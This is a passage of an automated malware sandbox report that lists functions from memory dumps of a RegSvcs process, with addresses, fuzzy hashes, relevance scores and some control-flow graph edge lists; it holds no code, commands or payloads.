                                                                                    control_flow_graph 2257 4c25e0-4c2600 2258 4c2607-4c265d 2257->2258 2259 4c2602 2257->2259 2260 4c2667-4c2698 2258->2260 2259->2258 2263 4c269e-4c26e7 2260->2263 2264 4c29e2-4c2a14 2260->2264 2270 4c26ee-4c26f7 2263->2270 2271 4c26e9 2263->2271 2272 4c29d5-4c29db 2270->2272 2271->2270 2273 4c26fc-4c2772 call 4c0288 2272->2273 2274 4c29e1 2272->2274 2280 4c282e-4c2888 2273->2280 2281 4c2778-4c27e6 2273->2281 2274->2264 2292 4c2889-4c28d7 2280->2292 2290 4c27e8-4c2828 2281->2290 2291 4c2829-4c282c 2281->2291 2290->2291 2291->2292 2297 4c28dd-4c29bf 2292->2297 2298 4c29c0-4c29cb 2292->2298 2297->2298 2299 4c29cd 2298->2299 2300 4c29d2 2298->2300 2299->2300 2300->2272
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 44f324ae5550ba76f5ce796ebfcdc45219408956fb1d4d9e597bd57dda196f49
                                                                                    • Instruction ID: 2bb227a07af3181f2ec0baef78a141cf3b11c4ce3dc60841819b364faaa54418
                                                                                    • Opcode Fuzzy Hash: 44f324ae5550ba76f5ce796ebfcdc45219408956fb1d4d9e597bd57dda196f49
                                                                                    • Instruction Fuzzy Hash: B3C1D478E00218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB755E85CF50
                                                                                    Function 004CC480 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c756e931356fe49258e24adb83b2c2d96f8a65fb74195d349cbb199bcc371fa
                                                                                    • Instruction ID: 227eec3d780d623b720fc68a584bd9224a88e27e436ed6cdcb8d044a48e882ae
                                                                                    • Opcode Fuzzy Hash: 6c756e931356fe49258e24adb83b2c2d96f8a65fb74195d349cbb199bcc371fa
                                                                                    • Instruction Fuzzy Hash: 18C1D574E00218CFDB54DFA5C994BADBBB2BF89300F2080AAD409AB395DB355E85CF50
                                                                                    Function 003C7D30 Relevance: .2, Instructions: 220COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a0f90bc8577519aa0a2898ff950f81d06973541245f79a988bbb0ce36c657ff9
                                                                                    • Instruction ID: 4de51a488e48f3514287b5be9083c582e7c279cc49d9e0c2096073ccad3676da
                                                                                    • Opcode Fuzzy Hash: a0f90bc8577519aa0a2898ff950f81d06973541245f79a988bbb0ce36c657ff9
                                                                                    • Instruction Fuzzy Hash: DFA11670D00218CFEB14DFA8C984BDDBBB1FF89304F209669E409AB291DB749A85CF55
                                                                                    Function 004CF460 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19605b79b259ec28ab304a602a55c7755fa27949d1a3fc961e39e9907dfd2ee4
                                                                                    • Instruction ID: 8db1037b99637395338993541b17172d0aa79111ee7064f45c8969f9ef973053
                                                                                    • Opcode Fuzzy Hash: 19605b79b259ec28ab304a602a55c7755fa27949d1a3fc961e39e9907dfd2ee4
                                                                                    • Instruction Fuzzy Hash: 16A1A574E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Function 004CEE10 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ffb216e9ff1eee0845c2d2dfc3527182be9cf7e139b9ff35b8ba417d4f99abd
                                                                                    • Instruction ID: ff6eb2bab10de0238f48a5a2f67625f5c686acdecb697672d7758e0b2cdb15a5
                                                                                    • Opcode Fuzzy Hash: 6ffb216e9ff1eee0845c2d2dfc3527182be9cf7e139b9ff35b8ba417d4f99abd
                                                                                    • Instruction Fuzzy Hash: 8DA19474E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40CA7255DB345A85CF55
                                                                                    Function 004CE7C0 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6015d4d44ed0facba3b72922b3df3603d7618e66935c50909f921c33f23c9cdf
                                                                                    • Instruction ID: 339677a37d60ffd41a8a07cecd3cf1372c871f314186e2643087022ee2991298
                                                                                    • Opcode Fuzzy Hash: 6015d4d44ed0facba3b72922b3df3603d7618e66935c50909f921c33f23c9cdf
                                                                                    • Instruction Fuzzy Hash: 31A1A575E012188FEB68CF6AC944B9EFBF2AF89300F14C0AAD40DA7251DB345A85CF55
                                                                                    Function 004CD4E0 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c845d52d8740d3c6a780543b19176fcb31e759caa6ea3db1dc35d6ffc55d4b6b
                                                                                    • Instruction ID: 644c18e0145653a68b4e3a466a8c55e28d0df6462381f30300cf699bf1db51f9
                                                                                    • Opcode Fuzzy Hash: c845d52d8740d3c6a780543b19176fcb31e759caa6ea3db1dc35d6ffc55d4b6b
                                                                                    • Instruction Fuzzy Hash: 39A19474E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Function 00890040 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f15eff3c3c62b968036783f1435344baf0361bdce725b9971a9eac1221f29315
                                                                                    • Instruction ID: 60d00d1a95baefdae431b990afff76dd83de42a06124c0572926a7a78eba6112
                                                                                    • Opcode Fuzzy Hash: f15eff3c3c62b968036783f1435344baf0361bdce725b9971a9eac1221f29315
                                                                                    • Instruction Fuzzy Hash: 91A18F74E012288FEB68DF6AC944B9DBBF2BF89300F14C1AAD40DA7255DB345A85CF51
                                                                                    Function 00890CD8 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 255c8209bd3d04f6249c0b51d936b19e0ef2f29e4b988937de111865b765b11d
                                                                                    • Instruction ID: c3577493b9a6e6975191112aa73a1286948cac51ae937c3bdfd927c984e11472
                                                                                    • Opcode Fuzzy Hash: 255c8209bd3d04f6249c0b51d936b19e0ef2f29e4b988937de111865b765b11d
                                                                                    • Instruction Fuzzy Hash: 44A19174E012288FEB68DF6AD944B9DBBF2BF89300F14C0AAD40DA7251DB345A85CF51
                                                                                    Function 004CE178 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 89a4089a18bf3db34575c26f262ff92c0bc78c3f2b34300d95fae4b5bd39a60f
                                                                                    • Instruction ID: b0e5f129a4433f4cde800e296deefbee7d56d8d8771c53d59349adb22e333fee
                                                                                    • Opcode Fuzzy Hash: 89a4089a18bf3db34575c26f262ff92c0bc78c3f2b34300d95fae4b5bd39a60f
                                                                                    • Instruction Fuzzy Hash: B8A19574E012288FEB68DF6AC944B9DFBF2AF89300F14C1AAD409A7251DB345A85CF55
                                                                                    Function 004CDB30 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: da5eadf1b6ef703f672a4c8d3145298019a38e1dedc7a28bd00235a69e353b91
                                                                                    • Instruction ID: c7cc758b79f5779d435143e5b9159faf3e5d6f203bdbeb188a3bec35622bcf81
                                                                                    • Opcode Fuzzy Hash: da5eadf1b6ef703f672a4c8d3145298019a38e1dedc7a28bd00235a69e353b91
                                                                                    • Instruction Fuzzy Hash: 00A1A574E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Function 00890690 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c86a9517022951ff9f812d5a80606fbdbd4fa3e9ef56c51bdaeb14ff2f8f033a
                                                                                    • Instruction ID: 26395f0f65acb532bc298902c93689b14685ed4c850c6da731f4036ee7c75c77
                                                                                    • Opcode Fuzzy Hash: c86a9517022951ff9f812d5a80606fbdbd4fa3e9ef56c51bdaeb14ff2f8f033a
                                                                                    • Instruction Fuzzy Hash: F7A19F75E012288FEB68DF6AC944B9DBBF2BF89300F14C1AAD409B7251DB345A85CF51
                                                                                    Function 003C8072 Relevance: .2, Instructions: 202COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fee07e0c491e484688b54a6cd5771d16c18cc053ec830704c6a6ec6189a86f9
                                                                                    • Instruction ID: 2bdfe277428e4cd798c0d1a7305116da3704522b276841bb8e27756b1e91d108
                                                                                    • Opcode Fuzzy Hash: 5fee07e0c491e484688b54a6cd5771d16c18cc053ec830704c6a6ec6189a86f9
                                                                                    • Instruction Fuzzy Hash: 62910574D00218CFEB11DFA4C884B9DBBB1FF89304F2496A9E409AB291DB759E85CF14
                                                                                    Function 00890012 Relevance: .1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.630114919.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_890000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c591770f773fc1cc6f49af6b368e4f7e764679b3b05de9505e921ebc9725e65b
                                                                                    • Instruction ID: b93da4ed738551f1e2f27b35366127eae080278e81acd911bf928775fc9b58c6
                                                                                    • Opcode Fuzzy Hash: c591770f773fc1cc6f49af6b368e4f7e764679b3b05de9505e921ebc9725e65b
                                                                                    • Instruction Fuzzy Hash: 2F519871D056588FEB59CF67C955789BBF3AFC9300F04C1AAC44CA6265DB340A86CF11
                                                                                    Function 004C25D0 Relevance: .1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f4b7bc7619c069f680f91eb360878864b5861c9dbd372ecbda2287c82cb02d1d
                                                                                    • Instruction ID: 98de89e9b6e2816dbb13f4f28549f20fbdbb56f09e1a06916d0b7f0ea20dd5fc
                                                                                    • Opcode Fuzzy Hash: f4b7bc7619c069f680f91eb360878864b5861c9dbd372ecbda2287c82cb02d1d
                                                                                    • Instruction Fuzzy Hash: 96411574E00248CFDB58DFA6C954B9EFBB2AF89300F20C12AD415AB255DB785946CF54
                                                                                    Function 003CFEC5 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1106 3cfec5-3cfed7 1107 3cfed9-3cfee9 1106->1107 1108 3cfe64-3cfe75 1106->1108 1116 3cfeee-3cfefb 1107->1116 1112 3cfe7e-3cfe7f 1108->1112 1113 3cfe77 1108->1113 1112->1116 1113->1112 1115 3cfe32-3cfe44 1113->1115 1117 3cfe4d-3cfe4e 1115->1117 1118 3cfe46 1115->1118 1132 3cff03-3cff07 1116->1132 1117->1116 1118->1112 1118->1115 1118->1117 1120 3cfdb8 1118->1120 1121 3cfdba-3cfdcb 1118->1121 1122 3cfdfb-3cfe08 1118->1122 1123 3cfdb5-3cfdb6 1118->1123 1124 3cfd17-3cfd1d 1118->1124 1125 3cfd50-3cfd63 1118->1125 1126 3cfd32-3cfd4b 1118->1126 1127 3cfe2c-3cfe2d 1118->1127 1128 3cfda8-3cfdb2 1118->1128 1129 3cfe0a-3cfe2a LdrInitializeThunk 1118->1129 1130 3cfd24-3cfd2b 1118->1130 1131 3cfde1-3cfdf9 1118->1131 1136 3cfdb9 1120->1136 1137 3cfdcd 1121->1137 1138 3cfdd2 1121->1138 1122->1127 1123->1131 1124->1130 1134 3cfd6a-3cfda6 1125->1134 1135 3cfd65 1125->1135 1133 3cfdd5-3cfddb 1126->1133 1127->1132 1128->1123 1129->1127 1130->1126 1131->1122 1131->1129 1140 3cff0f-3cff18 1132->1140 1141 3cff09-3cff0e 1132->1141 1133->1125 1133->1131 1134->1128 1134->1136 1135->1134 1136->1121 1137->1138 1138->1133 1141->1140
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 280171e041c374b8acfc207a3fdd9abacd29072e7b53709314eb0186e5e35cfd
                                                                                    • Instruction ID: 15490a51587b972db99dac5cbc01e3b267d117911de4172abaf3ff6e2346dc50
                                                                                    • Opcode Fuzzy Hash: 280171e041c374b8acfc207a3fdd9abacd29072e7b53709314eb0186e5e35cfd
                                                                                    • Instruction Fuzzy Hash: 5A512274D05208CFCB15CFA9D488BECBBBABF49314F209629E01AEB2A5D7749845CF50
                                                                                    Function 003CFE53 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1174 3cfe53-3cfe5d 1175 3cfe5f-3cfe67 1174->1175 1176 3cfe69-3cfe6c 1174->1176 1177 3cfe6f-3cfe75 1175->1177 1176->1177 1178 3cfe7e-3cfe7f 1177->1178 1179 3cfe77 1177->1179 1181 3cfeee-3cfefb 1178->1181 1179->1178 1180 3cfe32-3cfe44 1179->1180 1182 3cfe4d-3cfe4e 1180->1182 1183 3cfe46 1180->1183 1197 3cff03-3cff07 1181->1197 1182->1181 1183->1178 1183->1180 1183->1182 1185 3cfdb8 1183->1185 1186 3cfdba-3cfdcb 1183->1186 1187 3cfdfb-3cfe08 1183->1187 1188 3cfdb5-3cfdb6 1183->1188 1189 3cfd17-3cfd1d 1183->1189 1190 3cfd50-3cfd63 1183->1190 1191 3cfd32-3cfd4b 1183->1191 1192 3cfe2c-3cfe2d 1183->1192 1193 3cfda8-3cfdb2 1183->1193 1194 3cfe0a-3cfe2a LdrInitializeThunk 1183->1194 1195 3cfd24-3cfd2b 1183->1195 1196 3cfde1-3cfdf9 1183->1196 1201 3cfdb9 1185->1201 1202 3cfdcd 1186->1202 1203 3cfdd2 1186->1203 1187->1192 1188->1196 1189->1195 1199 3cfd6a-3cfda6 1190->1199 1200 3cfd65 1190->1200 1198 3cfdd5-3cfddb 1191->1198 1192->1197 1193->1188 1194->1192 1195->1191 1196->1187 1196->1194 1205 3cff0f-3cff18 1197->1205 1206 3cff09-3cff0e 1197->1206 1198->1190 1198->1196 1199->1193 1199->1201 1200->1199 1201->1186 1202->1203 1203->1198 1206->1205
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 90e3e78a4017ae22145d0c5d4853c7a6e7dd9ea3bfb12c43ff665b053d33c479
                                                                                    • Instruction ID: 3eb1f93b9f548b03cfe9c01c2b2eccbd4c4e3c6306e4247d6410153e0e05166f
                                                                                    • Opcode Fuzzy Hash: 90e3e78a4017ae22145d0c5d4853c7a6e7dd9ea3bfb12c43ff665b053d33c479
                                                                                    • Instruction Fuzzy Hash: 8F51F074D01208CFDB15CFA9D488BDCBBB6FF49314F20952AE015AB2A5D7749885CF14
                                                                                    Function 004CCF30 Relevance: .1, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 824a7e1f7a24b6c67e8f4b28b815a24459edfa71a060506bd4b4b61dcf35166f
                                                                                    • Instruction ID: 5455ae2b0452b3669ac6bd41f3c02ebbd8dc8eefa232319db2ef62807118f5b1
                                                                                    • Opcode Fuzzy Hash: 824a7e1f7a24b6c67e8f4b28b815a24459edfa71a060506bd4b4b61dcf35166f
                                                                                    • Instruction Fuzzy Hash: F641A178D00218CFDB44DFA9D594BEDBBB2BF88301F14912AE415A73A4DB346A46CF94
                                                                                    Function 0018D044 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628782080.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_18d000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 503072f5767cb9ebda752efa9e0165fdc54259dccff47154474bc7672117ebdf
                                                                                    • Instruction ID: 845037203f0c96112a14d0e0e57cc657d761be649da082ddf2d8c49a9b9dfadf
                                                                                    • Opcode Fuzzy Hash: 503072f5767cb9ebda752efa9e0165fdc54259dccff47154474bc7672117ebdf
                                                                                    • Instruction Fuzzy Hash: F221D475604344EFDB14DF20E8C4B26BB65EB84714F34C6A9E8494B282C73ADA47DF61
                                                                                    Function 0018D03F Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628782080.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_18d000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                                                                                    • Instruction ID: ac013403fc2860e5ea0031ed1c85abab966b725f9d0b7b0b40704ccf597cec82
                                                                                    • Opcode Fuzzy Hash: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                                                                                    • Instruction Fuzzy Hash: 0B118B75504284DFDB11DF20D9C4B15BBB1FB84314F24C6AAE8494B696C33AD94ACFA2

                                                                                    Non-executed Functions

                                                                                    Function 004CC8D8 Relevance: .3, Instructions: 296COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 233b675a95d214192f73831eaf6b3fcaa8f58fbe595c7cbeafef18caf9ccb8ca
                                                                                    • Instruction ID: 7f70e713f7489d9925eec4763584c398205eea6cb55274751588425699be7699
                                                                                    • Opcode Fuzzy Hash: 233b675a95d214192f73831eaf6b3fcaa8f58fbe595c7cbeafef18caf9ccb8ca
                                                                                    • Instruction Fuzzy Hash: 02E1D574E00218CFEB54DFA5C884B9DBBB2BF89304F2080AAD409AB395DB755E85CF54
                                                                                    Function 003C7001 Relevance: .3, Instructions: 276COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3603da844e398de3a679221ef9ff0bda7f889bbededca899b07f94b54893ec76
                                                                                    • Instruction ID: 00aa6e7dc9236c5d74bb9035e3aa4c14fd02054604569fe6aae3e48062dc001c
                                                                                    • Opcode Fuzzy Hash: 3603da844e398de3a679221ef9ff0bda7f889bbededca899b07f94b54893ec76
                                                                                    • Instruction Fuzzy Hash: 54D1C474E00218CFDB14DFA5C984B9DBBB2BF89305F2084AAD809A73A5DB355E85CF10
                                                                                    Function 003C7461 Relevance: .3, Instructions: 275COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a15694fb3c3648eb07b7efb4ffa3b52d6e3613f3e5fcfb6bff063500287f607
                                                                                    • Instruction ID: 1c7ca249a40d5b958b128bf07649670c17d6fba6c992e9aaf35dd1e43126294d
                                                                                    • Opcode Fuzzy Hash: 7a15694fb3c3648eb07b7efb4ffa3b52d6e3613f3e5fcfb6bff063500287f607
                                                                                    • Instruction Fuzzy Hash: 19D1B374E04218CFDB14DFA5C954BADBBB2BF89301F2084AAD809A7365DB355E85CF50
                                                                                    Function 003C6BA0 Relevance: .3, Instructions: 273COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 093a0c6a2d484c5d500b31fc35a00719131f9d6d571ed14997aa0f851d00153d
                                                                                    • Instruction ID: c098381073d0fa52b36318a3325952b34235b08f575ae90703baf3b84ad84e3d
                                                                                    • Opcode Fuzzy Hash: 093a0c6a2d484c5d500b31fc35a00719131f9d6d571ed14997aa0f851d00153d
                                                                                    • Instruction Fuzzy Hash: 06D1C374E00218CFDB14DFA5D954BADBBB2BF89305F2080AAD809A73A5DB355E85CF50
                                                                                    Function 004C4448 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 493de5921ebb4c1ada22fc23250adfb9ef71077b6839a1c3d7bac5724ce894a9
                                                                                    • Instruction ID: 6abb75a334b0644030ffaa68c646656aa1f1f5448e2d0a314307e231d4a25b4a
                                                                                    • Opcode Fuzzy Hash: 493de5921ebb4c1ada22fc23250adfb9ef71077b6839a1c3d7bac5724ce894a9
                                                                                    • Instruction Fuzzy Hash: 7AC1C578E00218CFDB54DFA5C994B9DBBB2BF89300F6080AAD409AB395DB355E85CF54
                                                                                    Function 004CAA48 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 541cdb2b411a9a7e5d879a3a548d9b478dda121887b3ae0c227ca7f093fedfe1
                                                                                    • Instruction ID: f475bdbdace149e576351fd803f72dce993e6121030c096654b8b4a26e523d8e
                                                                                    • Opcode Fuzzy Hash: 541cdb2b411a9a7e5d879a3a548d9b478dda121887b3ae0c227ca7f093fedfe1
                                                                                    • Instruction Fuzzy Hash: 10C1D574E00218CFDB54DFA5C994B9DBBB2BF89304F2084AAD409AB395DB355E85CF50
                                                                                    Function 004C9D40 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule
